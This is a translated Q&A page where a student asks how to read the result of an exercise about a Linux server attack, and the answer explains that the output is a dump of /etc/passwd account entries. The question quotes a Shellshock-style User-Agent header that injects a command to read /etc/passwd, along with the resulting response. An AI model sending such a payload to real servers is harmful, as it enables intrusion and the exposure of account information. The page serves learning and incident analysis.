linux - 了解来自 Linux 服务器的 HTTP 响应

标签 linux shell security

<分区>

我正在解决一个问题,涉及某人利用 Linux 服务器中的漏洞来访问它。问题的第一部分说明

监控关键的 Goldmine Tech Web 服务器和 不受信任的外部 IP,Bob 从不受信任的 IP 发现以下 HTTP GET 请求:

GET /cgi-bin/status/status.cgi HTTP/1.1
Host: motherlode.goldminetech.edu
User-Agent: () { :;}; echo "PWNED by 0c007: “ $(</etc/passwd)

据我所知,shell 脚本注入(inject)被用作命令 $(</etc/passwd)被执行,使黑客能够访问此密码文件夹。然后,这里列出了一个 HTTP 响应:

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Content-Length: length
root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:200:1::/var/adm/invscout:/usr/bin/ksh
nuucp:*:6:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
paul:!:201:1::/home/paul:/usr/bin/ksh
jdoe:*:202:1:John Doe:/home/jdoe:/usr/bin/ksh

我应该确定黑客获得了哪些访问权限。这是我被困的地方,因为我无法破译这个回应。我环顾四周,找不到任何解释如何从 Linux 服务器读取 HTTP 响应的内容。任何帮助将不胜感激。

最佳答案

这是包含系统用户的 /etc/passwd 文件的内容。它与位于 /etc/shadow 中的密码哈希分开。

攻击者知道系统上存在哪些帐户。他可以利用这些知识来暴力破解它们,并可能根据守护进程使用的用户名推断出有关系统的信息。

关于linux - 了解来自 Linux 服务器的 HTTP 响应,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/33003284/

相关文章:

c++ - RapidXML 奇怪的解析

linux - 数字数组之间有两个额外的空间

wcf - 我应该使用哪个 WCF 扩展点来实现自定义安全性?

javascript - 如何验证来自 socket.io 的数据包?

linux tar 命令 -t 选项显示 max-depth=1

linux - 命令未在 Linux EC2 实例启动时运行

c - (Linux) 如何在 c 中没有 x 的情况下获取鼠标的初始位置或设置光标位置?

linux - 如何在 Linux 中从 key 中提取 Value

regex - ngrep 如何使匹配表达式不区分大小写?

security - 如何使用 Electron 存储私钥或安全信息/数据